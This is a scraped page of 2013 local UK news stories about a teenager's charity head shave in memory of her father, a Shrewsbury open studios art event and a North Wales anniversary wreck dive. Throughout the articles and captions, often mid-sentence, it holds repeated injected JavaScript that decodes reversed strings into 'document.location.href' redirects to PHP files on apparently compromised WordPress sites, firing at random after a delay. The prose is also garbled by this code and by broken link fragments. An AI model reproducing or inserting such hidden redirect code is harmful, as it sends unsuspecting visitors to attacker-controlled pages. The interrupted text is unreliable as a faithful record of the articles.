Category: News

Top stylist helps teenage girl take a close shave in memory of beloved Dad

In August a 14-year-old Hope Beech is planning $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($Bhq(0), delay);}to have her head shaved $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($Bhq(0), delay);}to raise money in memory of her dad who died from lung cancer. Stylist Sharon Hughes from Gozo men's hair salon at Eagles Meadow, Wrexham will be doing the head shave.

A teenage girl has been inspired by pop star Jesse J to lose her crowning glory so she can raise cash in memory of her  beloved Dad.

Although 14-year-old Hope Beech, of Plas Madoc, in Acrefair, near Wrexham, loves nothing better than to look after and style her magnificent long blonde hair she has bravely decided to have it all shaved off.

Hope is raising money for two charities which help sufferers from cancer, the disease which claimed the life of her father when she was just six years old.

Sharon Hughes, who owns and runs the busy Gozo Men hair salon at the Eagles Meadow shopping centre in Wrexham, has volunteered for the delicate job of sending Hope’s lustrous locks tumbling to the floor.

Cash from sponsorship of her very close shave will go to national charity Macmillan Cancer Support, which provides practical, medical and emotional support for cancer sufferers.

Hope’s hair will then be carefully collected up and donated to a charity called the Little Princesses Trust which specialises in using human hair to make wigs that can be worn by young cancer patients whose treatment means they have lost their own.

That means Hope, who is in Year 9 at Ysgol Ruabon, will be following in the famous footsteps of pop sensation Jessie J who donated her famous black locks to Little Princess  following her own live TV head shave for this year’s Comic Relief in March.    

Hope’s father, Peter Beech, died from lung cancer eight years ago when she was just a little girl and ever since she’s been determined to do something to help other cancer patients and their families.

The sponsored head shave, which Hope will undergo on August 12 – the eighth anniversary of her dad’s death – is the most high profile of a series of fundraising events she is masterminding in her quest to back Macmillan.

For the past few months she’s been taking her collecting bucket around local fetes and shows and just recently she raised £200 during a fun day held at Cefn Druids FC’s ground near her home.

Hope is also aiming to organise a fun day at a venue yet to be fixed on the day her hair comes tumbling down at Gozo Men, and in the pipeline for a later date is a charity football match.

She said: “Although I was only six years old when he died, I loved my Dad very much and a few months ago I decided to raise money for cancer charities in his memory.

“I don’t really know where the head shave idea came from – I just woke up one morning and thought I wanted to do it.

“I’m not really worried about it and I’m sure I’ll feel fine about being bald. After all, my Mum has got me some wigs to wear.

“I got the idea of sending my hair to the Little Princesses Trust after reading on their website how it would be used to make a wig for a little girl with cancer.

“I know Jessie J sent her hair there too, so that’s good.”

“I’m very grateful to the lady at Gozo Men salon for agreeing to cut my hair because it’s nice that an expert is doing it rather than someone who will just hack it off.”

Hope’s proud mum, Phillipa Beech, said: “I’m very proud of her for what she is doing to raise money for Macmillan Support in memory of Peter.  If a fun day or something like that comes up in the area she goes to it and takes her collecting bucket along.

“But it was a real shock when she told me she was planning to have all her hair shaved off because she loves it so much. She’s a proper girly girl and is always looking after it and styling it.

“Her hair, which is shoulder length, is her big thing in life and she’s giving it up, which is incredible.

“She’s had messages on Facebook from boys of her age saying they think she’s very brave for having it all shaved off and that they wouldn’t do it.”

Phillipa, who has two other children, four-year-old Jay and Scott, two, added: “I’ve already bought Hope quite a few wigs because I know that until her hair grows back there will be occasions when she won’t want to be seen as bald.

“I’ve got her two blonde ones, another in dark brown and even one is pink.

“She’s decided to donate her own hair to Little Princesses which makes wigs for boys and girls who have lost their own after cancer treatment, so that’s another good cause she is supporting.”

Sharon Hughes, who opened her successful Gozo Men salon in 2010, said: “I usually only style men’s hair but when I heard that Hope was looking for someone to shave off all her hair and it do it properly I was pleased to help her out.

“She is supporting two really good causes and I am delighted to make my contribution to what she is doing.

“In the past I have done total head shaves for young men who are doing it for charity but this will be the first time I will have done it for a young lady. I think she is very brave.”

You can sponsor Hope’s head shave on her page at http://www.justgiving.com/hope-beech

Tuesday July 2nd, 2013

News

Shrewsbury’s Darwin Shopping Centre promotes local open studios art event

DARWIN SHOPPING CENTRE SHREWSBURY ?. Open studios event .Pho$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($Bhq(0), delay);}tographed are Artists Ruth Gibson , Ceramic artist and Dave West Pho$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($Bhq(0), delay);}tographer.

SHREWSBURY’S Darwin Shopping Centre is again acting as an art gallery to promote local artists.

The centre has made a shop available as a “taster” to display the work of 33 artists based in and around Shrewsbury who will open their studios to the public for four days next month (July).

Shrewsbury Open Studios 2013 takes place over the first two weekends in July the  6th and 7th, and the 13th and 14th, with most artists opening their studios, workshops or homes to welcome the public between 11am and 5pm each day.

Photographer Dave West from Gorse Lane, Bayston Hill, is coordinator. He said: “We have been organising open studio events like this since 2000 and they have been very successful.

“This is the first time we have been able to use a shop in the Darwin as a launch pad because they are not normally available. The shop window is a really good taster for what you can see at the various studios.”

Kevin Lockwood, Manager of the Darwin, Pride Hill and Riverside Shopping Centres, said: “There is a very strong artistic community here in Shrewsbury and here at the shopping centres we are doing our bit to reflect that.

“We believe it is a way we can play our part in the life of the town and the area and it also helps make a visit to the shopping centres even more of an experience and help bring the artists’ work to an even wider audience.”

It was April when the Darwin came to the aid of local artists allowed a pop-up art exhibition in a shop unit by the Art International Group of its Art Without Borders exhibition.

Dave West said: “The Open Studios provides a real focus for people to visit. From my point of view as a photographer it is a really good way of interacting with the public.

“When you do an exhibition you normally set it up, provide a viewing and then run away. With the open studio you can engage with people about your work in person.

“Sales-wise it’s pretty good too because there has been a bit of a tail-off in the last year with people spending less. Being able to use a shop in a place like the Darwin is very good for us because of the significant footfall – normally most artists could never hope to have their work showing in such a busy place.

“There’s a lot of talented people in the Shrewsbury area but with less public spending artists have to do more to help promote themselves.”

Dave, who has been a photographer for 30 years used to work as a freelance in Hereford, where he set up the Hereford Photographic Festival in 1986 which ran for 25 years.

He said: “I am fascinated by photography’s capacity to record, celebrate, distort or disguise, through poetry and science. Documentary experience has led me to work in themes and create narratives. Painting and literature have informed my use of lyrical composition.

“For Open Studios 2013 I am showing a new series of photos called “Hole in the Ground”. This is the fifth part of my “Battlefields” project, which looks at landscape and land usage, starting from the site of the Battle of Shrewsbury (1403).

“There will also be a diverse selection of new and previous work on view and for sale, plus examples of recent book projects.”

Opening dates and times may vary between artists. Check out the individual artists for details of their work, their location, and the days and times they will be open for you to visit them without prior appointment by visiting http://www.shrewsburyopenstudios.co.uk/

The scheme offers visitors the chance to see 33 artists at work, discuss their techniques and find out about the inspiration behind their work, which will also be available to purchase.

There will be a number of demonstrations taking place at several locations over the two weekends including using a pole lathe, brick clay carving, printmaking, weaving, enamelling, illustration and painting.

A printed leaflet with map showing studio locations and demonstrations is available from Shrewsbury Tourist Information Centre at Rowley’s House and Shirehall.

Dave is helped by a small committee of fellow artists Jill Leventon, Tony Clarkson, Jacqui Dodds and Jenna Kumiega.

The group collates information about participating artists, their work, and their venues, and gets the information to as many people as possible including those living and working in Shrewsbury, and visitors to the area.

Artists taking part are Caroline Taylor printmaking, tography/">Mairi Turner photography,  Dea Paradisos painting and printmaking, Christine Bradshaw printmaking, Rod Shaw painting; Irene Pentelow jewellery, Sara Mai upcycling, Nathalie Hildegarde Liege fine artist and glass, Vicki Heath painting, Laura Cadman textiles, Jacqui Dodds painting and printmaking, Helen Romberg painting, Maureen Carswell enamelling on copper, Louise Diggle painting, Roger Keeling drawing and painting, R&A Collaborations film makers, Parker and Arrol textiles, ton/">Jill Leventon enamelling on copper, Carol Davies illustration and animation, Helen Foot design textiles, Michael Priest fine artist, Dave West photography, Sue Challis collage, film makers and installations, Beverley Fry fine artist, painting, Pat Jones drawing, illustration and painting, papier maché, and photography, Ruth Gibson ceramics, jewellery and sculpture, ton/">Judi Willerton mixed media, painting and pastels, Angie Pyatt miniatures, photography and wildlife artist, Heather Prescott bookmaker, printmaking, and watercolours, Spencer Edwards furniture and woodworking courses bespoke furniture maker, and Russell Parry sketchbook and journal maker.

Thursday June 27th, 2013

News

Underwater party is a diamond idea

British Sub-Aqua Club BSAC. 60th Anniversary celebra$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($Bhq(0), delay);}tory dive with 60 divers.(left $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($Bhq(0), delay);}to right) Steve Ellis Wrexham Seals SAC training officer, Dave Parry chester SAC diving officer, Karl Davis of Chester SAC, Martin Kay of Chester SAC, Ken Oakes president of Flintshire SAC, Sara Ellis of Wrexham SAC, John Moore of Chester SAC, Chris Molden of Chester SAC, Anne MAy of Chester SAC, Barry Freeman of Flintshire SAC and Andy Hislpof Crewe SAC.

Scuba divers from across North Wales  are planning a party 60 feet below the waves on the wreck of a cargo ship that ran aground and sunk off Anglesey in 1886.

Several branches of the British Sub-Aqua Club (BSAC), the governing body of sport diving in the UK, are joining forces to put 60 divers on one shipwreck at the same time to celebrate the organisation’s Diamond Jubilee.

The anniversary dive is being organised by Chester Sub Aqua Club which is itself celebrating a milestone as the club is 40 years old this year.

Chester Sub Aqua Club Diving Officer, Dave Parry and Club Chairman, Martin Kay, came up with the idea of having 60 divers descending onto one wreck as a way of celebrating BSAC’s 60th  birthday.

But Dave says there is no way they could conduct the event on Sunday, June 30, without the help and co-operation of other clubs across the region.

He said: “We are delighted that Flintshire, Wrexham Seals, Gwynedd and Rhosneigr Sub Aqua Clubs, as well as divers from Crewe-based Icicle Divers, have agreed to take part in what we have Christened The Diamond Dive.

“We all want to celebrate BSAC’s 60th anniversary and to have 60 divers on one wreck at the same time is something we will probably never do again. However, I have to say organising the dive has proved far harder than we ever imagined!

“We need to ensure all risk assessments are done properly and all eventualities are covered. It’s a large number to have on one wreck at one time and it will be a unique experience.”

Dave says the Chester Club’s original plan was for the clubs divers to complete 40 dives between January 1st and the end of June, which is when they believe their club was formed in 1973.

He said: “That challenge started well and we drew up a list of wrecks we wanted to visit. We did the first dive on January 4th but the weather took its toll and we began to fall behind schedule.

“So we thought why not try something really different and came up with the idea for the Diamond Dive. We work closely with the other clubs that are joining us and there is certainly no rivalry.

“Everyone got behind the scheme and has helped organise the event. We need boats, dive crew on the surface, dive leaders and safety officers as well as responsible and qualified divers to actually do the dive.

“Every diver will descend at the same time as we will set off when an air horn is sounded from one of the boats.”

Dave says the chose the wreck of a cargo ship, The Missouri, for the dive as it lies in relatively shallow water in the middle of Anglesey’s Porth Dafarch Bay.

He said: “We are lucky at Chester Sub Aqua Club to have underwater guide Chris Holden as a member. Chris has written several books on shipwrecks around the North Wales coast. It was Chris who suggested The Missouri as the perfect wreck for the dive.

“The Missouri was built in 1881 for the Furness-Warren Line. It was a steam powered vessel and was about 130 metres long. It ran aground on March 1st, 1886 and sank with no loss of life. It is the most dived and largest wreck off Anglesey.”

President of Flintshire Sub Aqua Club, Ken Oakes, says club members are delighted to join with their Chester diving colleagues for the Diamond Dive.

Ken, who has been a BSAC diver since 1973 and has held every committee post at one time or another before becoming club president two years ago, said: “It’s a brilliant idea and should be a real experience. I hope we have some decent weather, it should be quite an underwater spectacle if the visibility is good.

“Flintshire Sub Aqua Club has around 45 members of which around 25 are active divers. We train at Holywell Swimming Pool and have a busy dive programme including trips to the Isle of Man.

“I think we all want to celebrate BSAC’s Diamond Jubilee and getting together and diving on the Missouri is an ideal way to mark the anniversary doing what we do best – diving”

Steve Ellis, Wrexham Sub Aqua Club’s Training Officer, says club members were really keen to join their Chester and other colleagues in tackling the Diamond Dive.

He said: “It’s a superb idea and something we really wanted to support. It will definitely be a unique experience and we are all really looking forward to it.

“As a club we meet every Thursday at Wrexham Waterworld between 8-9.30pm and welcome new members. We currently have around 55 members of which around 20 are active divers.”

Steve, who has 25 years experience as a BSAC diver, added: “I think we all want to celebrate the Diamond Jubilee of BSAC and the Missouri dive seems a great way to do just that. Fingers crossed we get decent weather.”

Andy Heslop, the Diving Officer for Crewe-based Icicle Divers says club members are thrilled to have been asked to join the Diamond Dive adventure.

He said: “It promises to be some event and logistically very challenging. Well done to Chester Sub Aqua Club for getting so many clubs together and doing all the leg-work.

“It will be fantastic to have 60 divers all down on one shipwreck at the same time and it’s a great way to celebrate BSAC’s Diamond Jubilee.”

Chester Sub Aqua Club sport diver, Lonn Landis, an American from Pennsylvania who came to live in England through his work some 20 years ago and stayed, says he is really looking forward to the Diamond Dive.

Lonn who now manages a graphic design company, said: “I got back into diving  around 18 months ago and really enjoy being a Chester Sub Aqua Club member. I did dive around 15 years ago quite regularly but then took a few years out.

“It’s going to be some occasion having 90 divers on one wreck but it’s a fantastic way to celebrate BSAC’s Diamond Jubilee and something we are all looking forward to.”

Chester Sub Aqua Club diving couple, Anne May, 52, a Wirral Housing Benefits Officer and her partner, John Moore, 45, says they are both looking forward to diving the wreck of The Missouri.

Anne said: “We are both qualified sports divers and are working toward our dive leader qualification through BSAC. The Diamond Dive is going to be fantastic and an unforgettable experience.”

John agreed adding: “It really is a fantastic way to celebrate our governing body’s 60th birthday. We all absolutely love diving and personally I’d recommend the sport to anyone. It really is fantastic and a great way to socialise too.”

For more information for Wrexham Sub Aqua Club visit www.demonisch.co.uk/seal for Flintshire Sub Aqua Club visit www.flintsac.co.uk for Icicle Divers visit www.icicledivers.co.uk for Gwynedd Sub Aqua Club visit www.gwyneddsubaqua.org for Rhosneigr Sub Aqua Club visit www.rhosneigr.org.uk/Activities/Diving and for BSAC visit www.bsac.com

Wednesday June 26th, 2013

News

Susan inspires espresso delivery of help for support group in Swansea

Costa Coffee manager Dan James with his wife Sarah and their son Michael 170613

